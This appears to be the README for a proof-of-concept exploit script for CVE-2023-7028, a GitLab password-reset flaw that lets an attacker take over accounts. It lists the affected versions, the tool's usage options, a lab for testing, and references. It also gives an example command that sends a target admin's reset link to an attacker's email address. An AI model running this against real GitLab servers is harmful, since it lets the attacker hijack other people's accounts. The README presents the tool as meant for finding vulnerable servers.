CVE-2023-7028

⚠️ This exploit is for defensive purposes and should be used by cybersecurity professionals to identify possible vulnerable GitLab servers.

Description

CVE-2023-7028 - Account Takeover via Password Reset without user interactions in GitLab Community Edition and Enterprise Edition

Products and Versions affected:

Product	Affected Versions
GitLab Community Edition and Enterprise Edition	< 16.1.6 < 16.2.9 < 16.3.7 < 16.4.5 < 16.5.6 < 16.6.4 < 16.7.2

• CVSS: 10.0
• Actively Exploited: NO
• Patch: YES
• Mitigation: NO

Help

usage: CVE-2023-7028.py [-h] -u URL -t TARGET -a ATTACKER

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     GitLab URL (HTTP or HTTPS)
  -t TARGET, --target TARGET
                        Target email address
  -a ATTACKER, --attacker ATTACKER
                        Attacker email address

Example: python CVE-2023-7028.py -u https://gitlab.example.com -t admin@example.com -a attacker@notexample.com

Lab

You can use Try Hack Me's Room GitLab CVE-2023-7028 to test the exploit because it runs a vulnerable version affected by CVE-2023-7028.

Vision of GitLab Servers by SHADOWSERVER:

References

• GitLab Critical Security Release: 16.7.2, 16.6.4, 16.5.6
• Over 5,300 GitLab servers exposed to zero-click account takeover attacks
• Shadowserver GitLab Statistics
• CVE-2023-7028 - AttackerKB